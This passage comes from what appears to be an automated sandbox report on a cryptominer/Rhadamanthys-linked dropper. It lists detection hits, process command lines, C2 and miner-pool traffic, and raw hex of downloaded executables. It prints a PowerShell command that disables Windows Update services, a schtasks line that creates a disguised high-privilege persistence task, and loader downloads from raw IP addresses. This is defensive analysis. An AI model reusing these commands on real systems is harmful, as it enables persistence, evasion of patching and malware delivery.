                              Source: Process startedAuthor: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell.exe -Command "$services = @(\"wuauserv\",\"UsoSvc\",\"bits\",\"dosvc\",\"waasmedicSvc\"); foreach ($svc in $services) { Stop-Service $svc -ErrorAction SilentlyContinue -Force; Set-Service $svc -StartupType Disabled -ErrorAction SilentlyContinue; }", CommandLine: powershell.exe -Command "$services = @(\"wuauserv\",\"UsoSvc\",\"bits\",\"dosvc\",\"waasmedicSvc\"); foreach ($svc in $services) { Stop-Service $svc -ErrorAction SilentlyContinue -Force; Set-Service $svc -StartupType Disabled -ErrorAction SilentlyContinue; }", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Microsoft\uqqqtttivubuibr.exe, ParentImage: C:\Users\user\AppData\Local\Microsoft\uqqqtttivubuibr.exe, ParentProcessId: 5612, ParentProcessName: uqqqtttivubuibr.exe, ProcessCommandLine: powershell.exe -Command "$services = @(\"wuauserv\",\"UsoSvc\",\"bits\",\"dosvc\",\"waasmedicSvc\"); foreach ($svc in $services) { Stop-Service $svc -ErrorAction SilentlyContinue -Force; Set-Service $svc -StartupType Disabled -ErrorAction SilentlyContinue; }", ProcessId: 1200, ProcessName: powershell.exe
                              Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, ProcessId: 7696, ProcessName: svchost.exe

                              Persistence and Installation Behavior

                              barindex
                              Source: Process startedAuthor: Joe Security: Data: Command: schtasks.exe /Create /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineCoreTask" /TR "C:\ProgramData\WinUpdate32\RuntimeBroker.exe" /RL HIGHEST /F, CommandLine: schtasks.exe /Create /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineCoreTask" /TR "C:\ProgramData\WinUpdate32\RuntimeBroker.exe" /RL HIGHEST /F, CommandLine|base64offset|contains: *j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Local\Microsoft\uqqqtttivubuibr.exe, ParentImage: C:\Users\user\AppData\Local\Microsoft\uqqqtttivubuibr.exe, ParentProcessId: 5612, ParentProcessName: uqqqtttivubuibr.exe, ProcessCommandLine: schtasks.exe /Create /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineCoreTask" /TR "C:\ProgramData\WinUpdate32\RuntimeBroker.exe" /RL HIGHEST /F, ProcessId: 5016, ProcessName: schtasks.exe
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2025-03-11T17:10:44.613818+010028032702Potentially Bad Traffic192.168.2.460014147.45.124.24180TCP
                              2025-03-11T17:10:48.883451+010028032702Potentially Bad Traffic192.168.2.460014147.45.124.24180TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2025-03-11T17:10:44.613818+010028290562Crypto Currency Mining Activity Detected192.168.2.460014147.45.124.24180TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2025-03-11T17:10:40.307588+010028548021Domain Observed Used for C2 Detected185.236.26.1115968192.168.2.460013TCP

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Source: C:\Users\user\AppData\Local\Temp\vwytuyiwrmnucib.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                              Source: C:\ProgramData\WinUpdate32\RuntimeBroker.exeReversingLabs: Detection: 15%
                              Source: C:\ProgramData\WinUpdate32\RuntimeBroker.exeVirustotal: Detection: 8%Perma Link
                              Source: C:\Users\user\AppData\Local\Microsoft\uqqqtttivubuibr.exeReversingLabs: Detection: 15%
                              Source: C:\Users\user\AppData\Local\Microsoft\uqqqtttivubuibr.exeVirustotal: Detection: 8%Perma Link
                              Source: Submited SampleIntegrated Neural Analysis Model: Matched 92.3% probability

                              Bitcoin Miner

                              barindex
                              Source: Yara matchFile source: dump.pcap, type: PCAP
                              Source: Yara matchFile source: 67.0.RtkAudUService64a.exe.7ff6ce520000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000043.00000002.2542723045.000002810FAAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000043.00000002.2542723045.000002810FADD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000043.00000000.2056256661.00007FF6CE8A4000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000043.00000002.2542723045.000002810FA70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000043.00000002.2542723045.000002810FA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: unknownDNS query: name: xmr-eu1.nanopool.org
                              Source: Arly.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49723 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49725 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49726 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49727 version: TLS 1.2
                              Source: Arly.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                              Source: Binary string: C:\Users\szska\.nexe\16.20.2\out\Release\node.pdb source: Arly.exe, 00000000.00000000.1266638136.000000000336D000.00000002.00000001.01000000.00000003.sdmp
                              Source: C:\Windows\System32\fontdrvhost.exeCode function: 4x nop then dec esp62_2_0000023364730511

                              Networking

                              barindex
                              Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 185.236.26.111:5968 -> 192.168.2.4:60013
                              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.236.26.111 5968
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 3000
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 3000
                              Source: unknownNetwork traffic detected: HTTP traffic on port 3000 -> 49719
                              Source: global trafficTCP traffic: 192.168.2.4:49719 -> 185.170.153.104:3000
                              Source: global trafficTCP traffic: 192.168.2.4:49720 -> 5.252.153.122:3000
                              Source: global trafficTCP traffic: 192.168.2.4:60013 -> 185.236.26.111:5968
                              Source: global trafficTCP traffic: 192.168.2.4:60016 -> 163.172.154.142:10343
                              Source: global trafficTCP traffic: 192.168.2.4:60007 -> 162.159.36.2:53
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 11 Mar 2025 16:09:43 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Tue, 11 Mar 2025 07:27:44 GMTETag: "4e7600-6300c06532ed3"Accept-Ranges: bytesContent-Length: 5142016Connection: closeContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0a 00 e9 d9 cf 67 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 29 00 a0 35 00 00 72 4e 00 00 04 00 00 e0 13 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 f0 4e 00 00 04 00 00 5b 10 4f 00 02 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 00 f0 34 00 00 00 00 00 00 00 00 00 00 00 60 48 00 ec 8a 01 00 00 00 00 00 00 00 00 00 00 60 4e 00 fc 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8a 47 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0c 4e 00 c8 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 9e 35 00 00 10 00 00 00 a0 35 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 2e 64 61 74 61 00 00 00 60 50 00 00 00 b0 35 00 00 52 00 00 00 a4 35 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 00 00 b0 42 12 00 00 10 36 00 00 44 12 00 00 f6 35 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 70 64 61 74 61 00 00 ec 8a 01 00 00 60 48 00 00 8c 01 00 00 3a 48 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 78 64 61 74 61 00 00 80 f1 03 00 00 f0 49 00 00 f2 03 00 00 c6 49 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 62 73 73 00 00 00 00 40 03 00 00 00 f0 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 69 64 61 74 61 00 00 f0 34 00 00 00 00 4e 00 00 36 00 00 00 b8 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 43 52 54 00 00 00 00 68 00 00 00 00 40 4e 00 00 02 00 00 00 ee 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 50 4e 00 00 02 00 00 00 f0 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 fc 82 00 00 00 60 4e 00 00 84 00 00 00 f2 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 11 Mar 2025 16:09:51 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Thu, 06 Mar 2025 13:30:23 GMTETag: "3daa00-62fac821ad56f"Accept-Ranges: bytesContent-Length: 4041216Connection: closeContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a6 73 80 a0 e2 12 ee f3 e2 12 ee f3 e2 12 ee f3 a9 6a ed f2 f0 12 ee f3 a9 6a eb f2 7d 12 ee f3 a9 6a ea f2 f4 12 ee f3 f7 6d eb f2 c4 12 ee f3 f7 6d ea f2 f3 12 ee f3 f7 6d ed f2 f7 12 ee f3 a9 6a ef f2 ed 12 ee f3 e2 12 ef f3 6b 12 ee f3 e2 12 ee f3 e3 12 ee f3 c5 d4 83 f3 e3 12 ee f3 d8 92 ea f2 e8 12 ee f3 d8 92 11 f3 e3 12 ee f3 d8 92 ec f2 e3 12 ee f3 52 69 63 68 e2 12 ee f3 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 5f 7b 5f 64 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 25 00 18 07 00 00 a2 00 00 00 00 00 00 47 3c 18 00 00 10 00 00 00 30 07 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 40 00 00 04 00 00 62 dc 3d 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b4 f0 07 00 dc 00 00 00 00 a0 07 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 20 20 20 20 20 5c 17 07 00 00 10 00 00 00 1e 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 20 20 20 20 20 20 20 20 b4 56 00 00 00 30 07 00 00 28 00 00 00 22 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 1e 0d 00 00 00 90 07 00 00 02 00 00 00 4a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 10 00 00 00 00 a0 07 00 00 02 00 00 00 4c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 20 20 20 20 20 20 20 20 24 38 00 00 00 b0 07 00 00 1a 00 00 00 4e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 69 64 61 74 61 00 00 00 10 00 00 00 f0 07 00 00 02 00 00 00 68 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 68 65 6d 69 64 61 00 40 38 00 00 00 08 00 00 40 38 00 00 6a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 11 Mar 2025 16:09:59 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Sun, 09 Mar 2025 21:03:27 GMTETag: "15e00-62fef2fe5c75a"Accept-Ranges: bytesContent-Length: 89600Connection: closeContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 d6 c5 43 90 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 50 01 00 00 0c 00 00 00 00 00 00 1e 6e 01 00 00 20 00 00 00 80 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 01 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 cc 6d 01 00 4f 00 00 00 00 80 01 00 99 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 01 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 4e 01 00 00 20 00 00 00 50 01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 99 08 00 00 00 80 01 00 00 0a 00 00 00 52 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 01 00 00 02 00 00 00 5c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6e 01 00 00 00 00 00 48 00 00 00 02 00 05 00 04 65 00 00 c8 08 01 00 01 00 00 00 3e 01 00 06 e8 64 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 08 02 00 00 00 90 77 53 de 00 00 00 00 49 44 41 54 90 db 7d 47 00 00 00 00 49 45 4e 44 ae 42 60 82 00 00 00 1e 02 28 58 00 00 0a 2a 1b 30 04 00 0e 02 00 00 01 00 00 11 00 02 28 d1 00 00 06 0a 20 77 50 fe ef 20 d2 22 21 d0 61 25 13 07 1c 5e 45 06 00 00 00 52 00 00 00 02 00 00 00 2e 00 00 00 3f 00 00 00 d3 ff ff ff 18 00 00 00 2b 50 7e 12 00 00 0a 0b 11 07 20 d0 9a 58 2d 5a 20 47 1b be 29 61 2b c0 06 8e 16 fe 03 2b 01 16 0c 08 39 a5 01 00 00 20 34 c7 ee e5 2b aa 00 11 07 20 ff b7 be 8e 5a 20 0c 88 57 e5 61 2b 99 06 2c dd 11 07 20 8c 0f 14 de 5a 20 2d 80 ff be 61 2b 86 06 28 d2 00 00 06 0d 09 16 28 d3 00 00 06 13 04 11 04 28 d4 00 00 06 13 05 00 20 ca 54 ee 96 20 d2 22 21 d0 61 25 13 07 19 5e 45 03 00 00 00 df ff ff ff 1b 00 00 00 02 00 00 00 2b 19 11 05 28 d5 00 00 06 0b 00 11 07 20 b5 a0 e7 7e 5a 20 dc 6a 3c e9 61 2b c9 de 54 11 05 2c 4f 20 d9 db a6 c6 20 d2 22 2
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 11 Mar 2025 16:10:03 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Sun, 09 Mar 2025 21:03:27 GMTETag: "38c00-62fef2fdf1092"Accept-Ranges: bytesContent-Length: 232448Connection: closeContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e6 ee 6e 9c a2 8f 00 cf a2 8f 00 cf a2 8f 00 cf e9 f7 03 ce a7 8f 00 cf e9 f7 05 ce 2f 8f 00 cf e9 f7 04 ce a8 8f 00 cf f0 fa 04 ce b2 8f 00 cf f0 fa 03 ce a8 8f 00 cf f0 fa 05 ce 8c 8f 00 cf e9 f7 01 ce a5 8f 00 cf a2 8f 01 cf c1 8f 00 cf 6f fa 09 ce a3 8f 00 cf 6f fa 02 ce a3 8f 00 cf 52 69 63 68 a2 8f 00 cf 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 9a 01 ce 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 1d 00 60 02 00 00 3e 01 00 00 00 00 00 cc d0 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 03 00 00 04 00 00 ee 0c 04 00 02 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 14 51 03 00 50 00 00 00 00 e0 03 00 f8 03 00 00 00 90 03 00 64 20 00 00 00 00 00 00 00 00 00 00 00 d0 03 00 c4 06 00 00 20 fc 02 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe 02 00 28 00 00 00 60 fc 02 00 38 01 00 00 00 00 00 00 00 00 00 00 00 70 02 00 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 4d 5e 02 00 00 10 00 00 00 60 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 04 ea 00 00 00 70 02 00 00 ec 00 00 00 64 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 cc 21 00 00 00 60 03 00 00 0c 00 00 00 50 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 64 20 00 00 00 90 03 00 00 22 00 00 00 5c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 5f 52 44 41 54 41 00 00 fc 00 00 00 00 c0 03 00 00 02 00 00 00 7e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c4 06 00 00 00 d0 03 00 00 08 00 00 00 80 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 f8 03 00 00 00 e0 03 00 00 04 00 00 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Source: global trafficHTTP traffic detected: GET /Lawxsz/vm-blacklist/main/ips.txt HTTP/1.1accept: */*host: raw.githubusercontent.com
                              Source: global trafficHTTP traffic detected: GET /Lawxsz/vm-blacklist/main/name.txt HTTP/1.1accept: */*host: raw.githubusercontent.com
                              Source: global trafficHTTP traffic detected: GET / HTTP/1.1accept: */*host: api.ipify.org
                              Source: global trafficHTTP traffic detected: GET /firehol/blocklist-ipsets/master/firehol_level1.netset HTTP/1.1accept: */*host: raw.githubusercontent.com
                              Source: global trafficHTTP traffic detected: GET /api/solmcrkr0u HTTP/1.1Host: 185.170.153.104:3000Connection: close
                              Source: global trafficHTTP traffic detected: GET /api/solmcrkr0u HTTP/1.1Host: 5.252.153.122:3000Connection: close
                              Source: global trafficHTTP traffic detected: GET /loader/28/file.exe HTTP/1.1Host: 138.124.55.36Connection: close
                              Source: global trafficHTTP traffic detected: GET /loader/1/file1.exe HTTP/1.1Host: 138.124.55.36Connection: close
                              Source: global trafficHTTP traffic detected: GET /loader/1/file2.exe HTTP/1.1Host: 138.124.55.36Connection: close
                              Source: global trafficHTTP traffic detected: GET /loader/1/file3.exe HTTP/1.1Host: 138.124.55.36Connection: close
                              Source: unknownDNS query: name: api.ipify.org
                              Source: unknownDNS query: name: api.ipify.org
                              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:60014 -> 147.45.124.241:80
                              Source: Network trafficSuricata IDS: 2829056 - Severity 2 - ETPRO MALWARE Observed Request for xmrig.exe in - Coinminer Download : 192.168.2.4:60014 -> 147.45.124.241:80
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.170.153.104
                              Source: unknownTCP traffic detected without corresponding DNS query: 5.252.153.122
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.170.153.104
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.170.153.104
                              Source: unknownTCP traffic detected without corresponding DNS query: 5.252.153.122
                              Source: unknownTCP traffic detected without corresponding DNS query: 5.252.153.122
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.170.153.104
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.170.153.104
                              Source: unknownTCP traffic detected without corresponding DNS query: 5.252.153.122
                              Source: unknownTCP traffic detected without corresponding DNS query: 5.252.153.122
                              Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                              Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                              Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                              Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                              Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                              Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                              Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                              Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                              Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                              Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                              Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                              Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                              Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                              Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                              Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                              Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                              Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                              Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                              Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                              Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                              Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                              Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                              Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                              Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                              Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                              Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                              Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                              Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                              Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                              Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                              Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                              Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                              Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                              Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                              Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                              Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                              Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                              Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                              Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                              Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                              Source: global trafficHTTP traffic detected: GET /Lawxsz/vm-blacklist/main/ips.txt HTTP/1.1accept: */*host: raw.githubusercontent.com
                              Source: global trafficHTTP traffic detected: GET /Lawxsz/vm-blacklist/main/name.txt HTTP/1.1accept: */*host: raw.githubusercontent.com
                              Source: global trafficHTTP traffic detected: GET / HTTP/1.1accept: */*host: api.ipify.org
                              Source: global trafficHTTP traffic detected: GET /firehol/blocklist-ipsets/master/firehol_level1.netset HTTP/1.1accept: */*host: raw.githubusercontent.com
